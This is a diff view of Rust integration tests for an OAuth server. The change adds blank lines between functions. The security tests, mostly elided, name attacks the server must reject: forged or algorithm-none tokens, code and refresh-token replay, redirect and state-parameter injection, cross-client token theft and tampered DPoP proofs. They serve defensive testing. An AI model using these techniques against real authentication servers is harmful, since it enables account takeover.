··· 8 use sha2::{Digest, Sha256}; 9 use wiremock::{Mock, MockServer, ResponseTemplate}; 10 use wiremock::matchers::{method, path}; 11 fn no_redirect_client() -> reqwest::Client { 12 reqwest::Client::builder() 13 .redirect(redirect::Policy::none()) 14 .build() 15 .unwrap() 16 } 17 fn generate_pkce() -> (String, String) { 18 let verifier_bytes: [u8; 32] = rand::random(); 19 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 23 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 24 (code_verifier, code_challenge) 25 } 26 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 27 let mock_server = MockServer::start().await; 28 let client_id = mock_server.uri();
··· 8 use sha2::{Digest, Sha256}; 9 use wiremock::{Mock, MockServer, ResponseTemplate}; 10 use wiremock::matchers::{method, path}; 11 + 12 fn no_redirect_client() -> reqwest::Client { 13 reqwest::Client::builder() 14 .redirect(redirect::Policy::none()) 15 .build() 16 .unwrap() 17 } 18 + 19 fn generate_pkce() -> (String, String) { 20 let verifier_bytes: [u8; 32] = rand::random(); 21 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 25 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 26 (code_verifier, code_challenge) 27 } 28 + 29 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 30 let mock_server = MockServer::start().await; 31 let client_id = mock_server.uri();
+18
tests/oauth_lifecycle.rs
··· 1 mod common; 2 mod helpers; 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 use chrono::Utc; 5 use common::{base_url, client}; ··· 9 use sha2::{Digest, Sha256}; 10 use wiremock::{Mock, MockServer, ResponseTemplate}; 11 use wiremock::matchers::{method, path}; 12 fn generate_pkce() -> (String, String) { 13 let verifier_bytes: [u8; 32] = rand::random(); 14 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 18 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 19 (code_verifier, code_challenge) 20 } 21 fn no_redirect_client() -> reqwest::Client { 22 reqwest::Client::builder() 23 .redirect(redirect::Policy::none()) 24 .build() 25 .unwrap() 26 } 27 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 28 let mock_server = MockServer::start().await; 29 let client_id = mock_server.uri(); ··· 43 .await; 44 mock_server 45 } 46 struct OAuthSession { 47 access_token: String, 48 refresh_token: String, 49 did: String, 50 client_id: String, 51 } 52 async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) { 53 let url = base_url().await; 54 let http_client = client(); ··· 125 }; 126 (session, mock_client) 127 } 128 #[tokio::test] 129 async fn test_oauth_token_can_create_and_read_records() { 130 let url = base_url().await; ··· 169 let get_body: Value = get_res.json().await.unwrap(); 170 assert_eq!(get_body["value"]["text"], post_text); 171 } 172 #[tokio::test] 173 async fn test_oauth_token_can_upload_blob() { 174 let url = base_url().await; ··· 191 assert!(upload_body["blob"]["ref"]["$link"].is_string()); 192 assert_eq!(upload_body["blob"]["mimeType"], "text/plain"); 193 } 194 #[tokio::test] 195 async fn test_oauth_token_can_describe_repo() { 196 let url = base_url().await; ··· 211 assert_eq!(describe_body["did"], session.did); 212 assert!(describe_body["handle"].is_string()); 213 } 214 #[tokio::test] 215 async fn test_oauth_full_post_lifecycle_create_edit_delete() { 216 let url = base_url().await; ··· 300 get_deleted_res.status() 301 ); 302 } 303 #[tokio::test] 304 async fn test_oauth_batch_operations_apply_writes() { 305 let url = base_url().await; ··· 367 let records = list_body["records"].as_array().unwrap(); 368 assert!(records.len() >= 3, "Should have at least 3 records from batch"); 369 } 370 #[tokio::test] 371 async fn test_oauth_token_refresh_maintains_access() { 372 let url = base_url().await; ··· 437 let records = list_body["records"].as_array().unwrap(); 438 assert_eq!(records.len(), 2, "Should have both posts"); 439 } 440 #[tokio::test] 441 async fn test_oauth_revoked_token_cannot_access_resources() { 442 let url = base_url().await; ··· 481 .unwrap(); 482 assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work"); 483 } 484 #[tokio::test] 485 async fn test_oauth_multiple_clients_same_user() { 486 let url = base_url().await; ··· 640 let records = list_body["records"].as_array().unwrap(); 641 assert_eq!(records.len(), 2, "Both posts should be visible to either client"); 642 } 643 #[tokio::test] 644 async fn test_oauth_social_interactions_follow_like_repost() { 645 let url = base_url().await; ··· 757 let likes = likes_body["records"].as_array().unwrap(); 758 assert_eq!(likes.len(), 1, "Bob should have 1 like"); 759 } 760 #[tokio::test] 761 async fn test_oauth_cannot_modify_other_users_repo() { 762 let url = base_url().await; ··· 804 let posts = posts_body["records"].as_array().unwrap(); 805 assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob"); 806 } 807 #[tokio::test] 808 async fn test_oauth_session_isolation_between_users() { 809 let url = base_url().await; ··· 878 assert_eq!(bob_posts.len(), 1); 879 assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts"); 880 } 881 #[tokio::test] 882 async fn test_oauth_token_works_with_sync_endpoints() { 883 let url = base_url().await;
··· 1 mod common; 2 mod helpers; 3 + 4 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 5 use chrono::Utc; 6 use common::{base_url, client}; ··· 10 use sha2::{Digest, Sha256}; 11 use wiremock::{Mock, MockServer, ResponseTemplate}; 12 use wiremock::matchers::{method, path}; 13 + 14 fn generate_pkce() -> (String, String) { 15 let verifier_bytes: [u8; 32] = rand::random(); 16 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 20 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 21 (code_verifier, code_challenge) 22 } 23 + 24 fn no_redirect_client() -> reqwest::Client { 25 reqwest::Client::builder() 26 .redirect(redirect::Policy::none()) 27 .build() 28 .unwrap() 29 } 30 + 31 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 32 let mock_server = MockServer::start().await; 33 let client_id = mock_server.uri(); ··· 47 .await; 48 mock_server 49 } 50 + 51 struct OAuthSession { 52 access_token: String, 53 refresh_token: String, 54 did: String, 55 client_id: String, 56 } 57 + 58 async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) { 59 let url = base_url().await; 60 let http_client = client(); ··· 131 }; 132 (session, mock_client) 133 } 134 + 135 #[tokio::test] 136 async fn test_oauth_token_can_create_and_read_records() { 137 let url = base_url().await; ··· 176 let get_body: Value = get_res.json().await.unwrap(); 177 assert_eq!(get_body["value"]["text"], post_text); 178 } 179 + 180 #[tokio::test] 181 async fn test_oauth_token_can_upload_blob() { 182 let url = base_url().await; ··· 199 assert!(upload_body["blob"]["ref"]["$link"].is_string()); 200 assert_eq!(upload_body["blob"]["mimeType"], "text/plain"); 201 } 202 + 203 #[tokio::test] 204 async fn test_oauth_token_can_describe_repo() { 205 let url = base_url().await; ··· 220 assert_eq!(describe_body["did"], session.did); 221 assert!(describe_body["handle"].is_string()); 222 } 223 + 224 #[tokio::test] 225 async fn test_oauth_full_post_lifecycle_create_edit_delete() { 226 let url = base_url().await; ··· 310 get_deleted_res.status() 311 ); 312 } 313 + 314 #[tokio::test] 315 async fn test_oauth_batch_operations_apply_writes() { 316 let url = base_url().await; ··· 378 let records = list_body["records"].as_array().unwrap(); 379 assert!(records.len() >= 3, "Should have at least 3 records from batch"); 380 } 381 + 382 #[tokio::test] 383 async fn test_oauth_token_refresh_maintains_access() { 384 let url = base_url().await; ··· 449 let records = list_body["records"].as_array().unwrap(); 450 assert_eq!(records.len(), 2, "Should have both posts"); 451 } 452 + 453 #[tokio::test] 454 async fn test_oauth_revoked_token_cannot_access_resources() { 455 let url = base_url().await; ··· 494 .unwrap(); 495 assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work"); 496 } 497 + 498 #[tokio::test] 499 async fn test_oauth_multiple_clients_same_user() { 500 let url = base_url().await; ··· 654 let records = list_body["records"].as_array().unwrap(); 655 assert_eq!(records.len(), 2, "Both posts should be visible to either client"); 656 } 657 + 658 #[tokio::test] 659 async fn test_oauth_social_interactions_follow_like_repost() { 660 let url = base_url().await; ··· 772 let likes = likes_body["records"].as_array().unwrap(); 773 assert_eq!(likes.len(), 1, "Bob should have 1 like"); 774 } 775 + 776 #[tokio::test] 777 async fn test_oauth_cannot_modify_other_users_repo() { 778 let url = base_url().await; ··· 820 let posts = posts_body["records"].as_array().unwrap(); 821 assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob"); 822 } 823 + 824 #[tokio::test] 825 async fn test_oauth_session_isolation_between_users() { 826 let url = base_url().await; ··· 895 assert_eq!(bob_posts.len(), 1); 896 assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts"); 897 } 898 + 899 #[tokio::test] 900 async fn test_oauth_token_works_with_sync_endpoints() { 901 let url = base_url().await;
+56
tests/oauth_security.rs
··· 12 use sha2::{Digest, Sha256}; 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 use wiremock::matchers::{method, path}; 15 fn no_redirect_client() -> reqwest::Client { 16 reqwest::Client::builder() 17 .redirect(redirect::Policy::none()) 18 .build() 19 .unwrap() 20 } 21 fn generate_pkce() -> (String, String) { 22 let verifier_bytes: [u8; 32] = rand::random(); 23 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 27 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 28 (code_verifier, code_challenge) 29 } 30 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 31 let mock_server = MockServer::start().await; 32 let client_id = mock_server.uri(); ··· 46 .await; 47 mock_server 48 } 49 async fn get_oauth_tokens( 50 http_client: &reqwest::Client, 51 url: &str, ··· 117 let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string(); 118 (access_token, refresh_token, client_id) 119 } 120 #[tokio::test] 121 async fn test_security_forged_token_signature_rejected() { 122 let url = base_url().await; ··· 134 .unwrap(); 135 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected"); 136 } 137 #[tokio::test] 138 async fn test_security_modified_payload_rejected() { 139 let url = base_url().await; ··· 153 .unwrap(); 154 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected"); 155 } 156 #[tokio::test] 157 async fn test_security_algorithm_none_attack_rejected() { 158 let url = base_url().await; ··· 181 .unwrap(); 182 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected"); 183 } 184 #[tokio::test] 185 async fn test_security_algorithm_substitution_attack_rejected() { 186 let url = base_url().await; ··· 209 .unwrap(); 210 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected"); 211 } 212 #[tokio::test] 213 async fn test_security_expired_token_rejected() { 214 let url = base_url().await; ··· 237 .unwrap(); 238 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected"); 239 } 240 #[tokio::test] 241 async fn test_security_pkce_plain_method_rejected() { 242 let url = base_url().await; ··· 264 "Error should mention S256 requirement" 265 ); 266 } 267 #[tokio::test] 268 async fn test_security_pkce_missing_challenge_rejected() { 269 let url = base_url().await; ··· 283 .unwrap(); 284 assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected"); 285 } 286 #[tokio::test] 287 async fn test_security_pkce_wrong_verifier_rejected() { 288 let url = base_url().await; ··· 352 let body: Value = token_res.json().await.unwrap(); 353 assert_eq!(body["error"], "invalid_grant"); 354 } 355 #[tokio::test] 356 async fn test_security_authorization_code_replay_attack() { 357 let url = base_url().await; ··· 434 let body: Value = replay_res.json().await.unwrap(); 435 assert_eq!(body["error"], "invalid_grant"); 436 } 437 #[tokio::test] 438 async fn test_security_refresh_token_replay_attack() { 439 let url = base_url().await; ··· 550 "Token family should be revoked after replay detection" 551 ); 552 } 553 #[tokio::test] 554 async fn test_security_redirect_uri_manipulation() { 555 let url = base_url().await; ··· 573 .unwrap(); 574 assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected"); 575 } 576 #[tokio::test] 577 async fn test_security_deactivated_account_blocked() { 578 let url = base_url().await; ··· 639 let body: Value = auth_res.json().await.unwrap(); 640 assert_eq!(body["error"], "access_denied"); 641 } 642 #[tokio::test] 643 async fn test_security_url_injection_in_state_parameter() { 644 let url = base_url().await; ··· 710 location 711 ); 712 } 713 #[tokio::test] 714 async fn test_security_cross_client_token_theft() { 715 let url = base_url().await; ··· 789 "Error should mention client_id mismatch" 790 ); 791 } 792 #[test] 793 fn test_security_dpop_nonce_tamper_detection() { 794 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 803 let result = verifier.validate_nonce(&tampered_nonce); 804 assert!(result.is_err(), "Tampered nonce should be rejected"); 805 } 806 #[test] 807 fn test_security_dpop_nonce_cross_server_rejected() { 808 let secret1 = b"server-1-secret-32-bytes-long!!!"; ··· 813 let result = verifier2.validate_nonce(&nonce_from_server1); 814 assert!(result.is_err(), "Nonce from different server should be rejected"); 815 } 816 #[test] 817 fn test_security_dpop_proof_signature_tampering() { 818 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 851 let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None); 852 assert!(result.is_err(), "Tampered DPoP signature should be rejected"); 853 } 854 #[test] 855 fn test_security_dpop_proof_key_substitution() { 856 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 888 let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None); 889 assert!(result.is_err(), "DPoP proof with mismatched key should be rejected"); 890 } 891 #[test] 892 fn test_security_jwk_thumbprint_consistency() { 893 let jwk = DPoPJwk { ··· 905 assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i); 906 } 907 } 908 #[test] 909 fn test_security_dpop_iat_clock_skew_limits() { 910 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 956 } 957 } 958 } 959 #[test] 960 fn test_security_dpop_method_case_insensitivity() { 961 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 992 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 993 assert!(result.is_ok(), "HTTP method comparison should be case-insensitive"); 994 } 995 #[tokio::test] 996 async fn test_security_invalid_grant_type_rejected() { 997 let url = base_url().await; ··· 1024 ); 1025 } 1026 } 1027 #[tokio::test] 1028 async fn test_security_token_with_wrong_typ_rejected() { 1029 let url = base_url().await; ··· 1066 ); 1067 } 1068 } 1069 #[tokio::test] 1070 async fn test_security_missing_required_claims_rejected() { 1071 let url = base_url().await; ··· 1098 ); 1099 } 1100 } 1101 #[tokio::test] 1102 async fn test_security_malformed_tokens_rejected() { 1103 let url = base_url().await; ··· 1130 ); 1131 } 1132 } 1133 #[tokio::test] 1134 async fn test_security_authorization_header_formats() { 1135 let url = base_url().await; ··· 1175 ); 1176 } 1177 } 1178 #[tokio::test] 1179 async fn test_security_no_authorization_header() { 1180 let url = base_url().await; ··· 1186 .unwrap(); 1187 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401"); 1188 } 1189 #[tokio::test] 1190 async fn test_security_empty_authorization_header() { 1191 let url = base_url().await; ··· 1198 .unwrap(); 1199 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401"); 1200 } 1201 #[tokio::test] 1202 async fn test_security_revoked_token_rejected() { 1203 let url = base_url().await; ··· 1219 let introspect_body: Value = introspect_res.json().await.unwrap(); 1220 assert_eq!(introspect_body["active"], false, "Revoked token should be inactive"); 1221 } 1222 #[tokio::test] 1223 #[ignore = "rate limiting is disabled in test environment"] 1224 async fn test_security_oauth_authorize_rate_limiting() { ··· 1274 rate_limited_count 1275 ); 1276 } 1277 fn create_dpop_proof( 1278 method: &str, 1279 uri: &str, ··· 1317 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1318 format!("{}.{}", signing_input, signature_b64) 1319 } 1320 #[test] 1321 fn test_dpop_nonce_generation() { 1322 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1326 assert!(!nonce1.is_empty()); 1327 assert!(!nonce2.is_empty()); 1328 } 1329 #[test] 1330 fn test_dpop_nonce_validation_success() { 1331 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1334 let result = verifier.validate_nonce(&nonce); 1335 assert!(result.is_ok(), "Valid nonce should pass: {:?}", result); 1336 } 1337 #[test] 1338 fn test_dpop_nonce_wrong_secret() { 1339 let secret1 = b"test-dpop-secret-32-bytes-long!!"; ··· 1344 let result = verifier2.validate_nonce(&nonce); 1345 assert!(result.is_err(), "Nonce from different secret should fail"); 1346 } 1347 #[test] 1348 fn test_dpop_nonce_invalid_format() { 1349 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1352 assert!(verifier.validate_nonce("").is_err()); 1353 assert!(verifier.validate_nonce("!!!not-base64!!!").is_err()); 1354 } 1355 #[test] 1356 fn test_jwk_thumbprint_ec_p256() { 1357 let jwk = DPoPJwk { ··· 1366 assert!(!tp.is_empty()); 1367 assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_')); 1368 } 1369 #[test] 1370 fn test_jwk_thumbprint_ec_secp256k1() { 1371 let jwk = DPoPJwk { ··· 1377 let thumbprint = compute_jwk_thumbprint(&jwk); 1378 assert!(thumbprint.is_ok()); 1379 } 1380 #[test] 1381 fn test_jwk_thumbprint_okp_ed25519() { 1382 let jwk = DPoPJwk { ··· 1388 let thumbprint = compute_jwk_thumbprint(&jwk); 1389 assert!(thumbprint.is_ok()); 1390 } 1391 #[test] 1392 fn test_jwk_thumbprint_missing_crv() { 1393 let jwk = DPoPJwk { ··· 1399 let thumbprint = compute_jwk_thumbprint(&jwk); 1400 assert!(thumbprint.is_err()); 1401 } 1402 #[test] 1403 fn test_jwk_thumbprint_missing_x() { 1404 let jwk = DPoPJwk { ··· 1410 let thumbprint = compute_jwk_thumbprint(&jwk); 1411 assert!(thumbprint.is_err()); 1412 } 1413 #[test] 1414 fn test_jwk_thumbprint_missing_y_for_ec() { 1415 let jwk = DPoPJwk { ··· 1421 let thumbprint = compute_jwk_thumbprint(&jwk); 1422 assert!(thumbprint.is_err()); 1423 } 1424 #[test] 1425 fn test_jwk_thumbprint_unsupported_key_type() { 1426 let jwk = DPoPJwk { ··· 1432 let thumbprint = compute_jwk_thumbprint(&jwk); 1433 assert!(thumbprint.is_err()); 1434 } 1435 #[test] 1436 fn test_jwk_thumbprint_deterministic() { 1437 let jwk = DPoPJwk { ··· 1444 let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 1445 assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 1446 } 1447 #[test] 1448 fn test_dpop_proof_invalid_format() { 1449 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1453 let result = verifier.verify_proof("invalid", "POST", "https://example.com", None); 1454 assert!(result.is_err()); 1455 } 1456 #[test] 1457 fn test_dpop_proof_invalid_typ() { 1458 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1479 let result = verifier.verify_proof(&proof, "POST", "https://example.com", None); 1480 assert!(result.is_err()); 1481 } 1482 #[test] 1483 fn test_dpop_proof_method_mismatch() { 1484 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1487 let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None); 1488 assert!(result.is_err()); 1489 } 1490 #[test] 1491 fn test_dpop_proof_uri_mismatch() { 1492 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1495 let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None); 1496 assert!(result.is_err()); 1497 } 1498 #[test] 1499 fn test_dpop_proof_iat_too_old() { 1500 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1503 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1504 assert!(result.is_err()); 1505 } 1506 #[test] 1507 fn test_dpop_proof_iat_future() { 1508 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1511 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1512 assert!(result.is_err()); 1513 } 1514 #[test] 1515 fn test_dpop_proof_ath_mismatch() { 1516 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1530 ); 1531 assert!(result.is_err()); 1532 } 1533 #[test] 1534 fn test_dpop_proof_missing_ath_when_required() { 1535 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1543 ); 1544 assert!(result.is_err()); 1545 } 1546 #[test] 1547 fn test_dpop_proof_uri_ignores_query_params() { 1548 let secret = b"test-dpop-secret-32-bytes-long!!";
··· 12 use sha2::{Digest, Sha256}; 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 use wiremock::matchers::{method, path}; 15 + 16 fn no_redirect_client() -> reqwest::Client { 17 reqwest::Client::builder() 18 .redirect(redirect::Policy::none()) 19 .build() 20 .unwrap() 21 } 22 + 23 fn generate_pkce() -> (String, String) { 24 let verifier_bytes: [u8; 32] = rand::random(); 25 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); ··· 29 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 30 (code_verifier, code_challenge) 31 } 32 + 33 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 34 let mock_server = MockServer::start().await; 35 let client_id = mock_server.uri(); ··· 49 .await; 50 mock_server 51 } 52 + 53 async fn get_oauth_tokens( 54 http_client: &reqwest::Client, 55 url: &str, ··· 121 let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string(); 122 (access_token, refresh_token, client_id) 123 } 124 + 125 #[tokio::test] 126 async fn test_security_forged_token_signature_rejected() { 127 let url = base_url().await; ··· 139 .unwrap(); 140 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected"); 141 } 142 + 143 #[tokio::test] 144 async fn test_security_modified_payload_rejected() { 145 let url = base_url().await; ··· 159 .unwrap(); 160 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected"); 161 } 162 + 163 #[tokio::test] 164 async fn test_security_algorithm_none_attack_rejected() { 165 let url = base_url().await; ··· 188 .unwrap(); 189 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected"); 190 } 191 + 192 #[tokio::test] 193 async fn test_security_algorithm_substitution_attack_rejected() { 194 let url = base_url().await; ··· 217 .unwrap(); 218 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected"); 219 } 220 + 221 #[tokio::test] 222 async fn test_security_expired_token_rejected() { 223 let url = base_url().await; ··· 246 .unwrap(); 247 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected"); 248 } 249 + 250 #[tokio::test] 251 async fn test_security_pkce_plain_method_rejected() { 252 let url = base_url().await; ··· 274 "Error should mention S256 requirement" 275 ); 276 } 277 + 278 #[tokio::test] 279 async fn test_security_pkce_missing_challenge_rejected() { 280 let url = base_url().await; ··· 294 .unwrap(); 295 assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected"); 296 } 297 + 298 #[tokio::test] 299 async fn test_security_pkce_wrong_verifier_rejected() { 300 let url = base_url().await; ··· 364 let body: Value = token_res.json().await.unwrap(); 365 assert_eq!(body["error"], "invalid_grant"); 366 } 367 + 368 #[tokio::test] 369 async fn test_security_authorization_code_replay_attack() { 370 let url = base_url().await; ··· 447 let body: Value = replay_res.json().await.unwrap(); 448 assert_eq!(body["error"], "invalid_grant"); 449 } 450 + 451 #[tokio::test] 452 async fn test_security_refresh_token_replay_attack() { 453 let url = base_url().await; ··· 564 "Token family should be revoked after replay detection" 565 ); 566 } 567 + 568 #[tokio::test] 569 async fn test_security_redirect_uri_manipulation() { 570 let url = base_url().await; ··· 588 .unwrap(); 589 assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected"); 590 } 591 + 592 #[tokio::test] 593 async fn test_security_deactivated_account_blocked() { 594 let url = base_url().await; ··· 655 let body: Value = auth_res.json().await.unwrap(); 656 assert_eq!(body["error"], "access_denied"); 657 } 658 + 659 #[tokio::test] 660 async fn test_security_url_injection_in_state_parameter() { 661 let url = base_url().await; ··· 727 location 728 ); 729 } 730 + 731 #[tokio::test] 732 async fn test_security_cross_client_token_theft() { 733 let url = base_url().await; ··· 807 "Error should mention client_id mismatch" 808 ); 809 } 810 + 811 #[test] 812 fn test_security_dpop_nonce_tamper_detection() { 813 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 822 let result = verifier.validate_nonce(&tampered_nonce); 823 assert!(result.is_err(), "Tampered nonce should be rejected"); 824 } 825 + 826 #[test] 827 fn test_security_dpop_nonce_cross_server_rejected() { 828 let secret1 = b"server-1-secret-32-bytes-long!!!"; ··· 833 let result = verifier2.validate_nonce(&nonce_from_server1); 834 assert!(result.is_err(), "Nonce from different server should be rejected"); 835 } 836 + 837 #[test] 838 fn test_security_dpop_proof_signature_tampering() { 839 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 872 let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None); 873 assert!(result.is_err(), "Tampered DPoP signature should be rejected"); 874 } 875 + 876 #[test] 877 fn test_security_dpop_proof_key_substitution() { 878 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 910 let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None); 911 assert!(result.is_err(), "DPoP proof with mismatched key should be rejected"); 912 } 913 + 914 #[test] 915 fn test_security_jwk_thumbprint_consistency() { 916 let jwk = DPoPJwk { ··· 928 assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i); 929 } 930 } 931 + 932 #[test] 933 fn test_security_dpop_iat_clock_skew_limits() { 934 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 980 } 981 } 982 } 983 + 984 #[test] 985 fn test_security_dpop_method_case_insensitivity() { 986 use p256::ecdsa::{SigningKey, Signature, signature::Signer}; ··· 1017 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1018 assert!(result.is_ok(), "HTTP method comparison should be case-insensitive"); 1019 } 1020 + 1021 #[tokio::test] 1022 async fn test_security_invalid_grant_type_rejected() { 1023 let url = base_url().await; ··· 1050 ); 1051 } 1052 } 1053 + 1054 #[tokio::test] 1055 async fn test_security_token_with_wrong_typ_rejected() { 1056 let url = base_url().await; ··· 1093 ); 1094 } 1095 } 1096 + 1097 #[tokio::test] 1098 async fn test_security_missing_required_claims_rejected() { 1099 let url = base_url().await; ··· 1126 ); 1127 } 1128 } 1129 + 1130 #[tokio::test] 1131 async fn test_security_malformed_tokens_rejected() { 1132 let url = base_url().await; ··· 1159 ); 1160 } 1161 } 1162 + 1163 #[tokio::test] 1164 async fn test_security_authorization_header_formats() { 1165 let url = base_url().await; ··· 1205 ); 1206 } 1207 } 1208 + 1209 #[tokio::test] 1210 async fn test_security_no_authorization_header() { 1211 let url = base_url().await; ··· 1217 .unwrap(); 1218 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401"); 1219 } 1220 + 1221 #[tokio::test] 1222 async fn test_security_empty_authorization_header() { 1223 let url = base_url().await; ··· 1230 .unwrap(); 1231 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401"); 1232 } 1233 + 1234 #[tokio::test] 1235 async fn test_security_revoked_token_rejected() { 1236 let url = base_url().await; ··· 1252 let introspect_body: Value = introspect_res.json().await.unwrap(); 1253 assert_eq!(introspect_body["active"], false, "Revoked token should be inactive"); 1254 } 1255 + 1256 #[tokio::test] 1257 #[ignore = "rate limiting is disabled in test environment"] 1258 async fn test_security_oauth_authorize_rate_limiting() { ··· 1308 rate_limited_count 1309 ); 1310 } 1311 + 1312 fn create_dpop_proof( 1313 method: &str, 1314 uri: &str, ··· 1352 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1353 format!("{}.{}", signing_input, signature_b64) 1354 } 1355 + 1356 #[test] 1357 fn test_dpop_nonce_generation() { 1358 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1362 assert!(!nonce1.is_empty()); 1363 assert!(!nonce2.is_empty()); 1364 } 1365 + 1366 #[test] 1367 fn test_dpop_nonce_validation_success() { 1368 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1371 let result = verifier.validate_nonce(&nonce); 1372 assert!(result.is_ok(), "Valid nonce should pass: {:?}", result); 1373 } 1374 + 1375 #[test] 1376 fn test_dpop_nonce_wrong_secret() { 1377 let secret1 = b"test-dpop-secret-32-bytes-long!!"; ··· 1382 let result = verifier2.validate_nonce(&nonce); 1383 assert!(result.is_err(), "Nonce from different secret should fail"); 1384 } 1385 + 1386 #[test] 1387 fn test_dpop_nonce_invalid_format() { 1388 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1391 assert!(verifier.validate_nonce("").is_err()); 1392 assert!(verifier.validate_nonce("!!!not-base64!!!").is_err()); 1393 } 1394 + 1395 #[test] 1396 fn test_jwk_thumbprint_ec_p256() { 1397 let jwk = DPoPJwk { ··· 1406 assert!(!tp.is_empty()); 1407 assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_')); 1408 } 1409 + 1410 #[test] 1411 fn test_jwk_thumbprint_ec_secp256k1() { 1412 let jwk = DPoPJwk { ··· 1418 let thumbprint = compute_jwk_thumbprint(&jwk); 1419 assert!(thumbprint.is_ok()); 1420 } 1421 + 1422 #[test] 1423 fn test_jwk_thumbprint_okp_ed25519() { 1424 let jwk = DPoPJwk { ··· 1430 let thumbprint = compute_jwk_thumbprint(&jwk); 1431 assert!(thumbprint.is_ok()); 1432 } 1433 + 1434 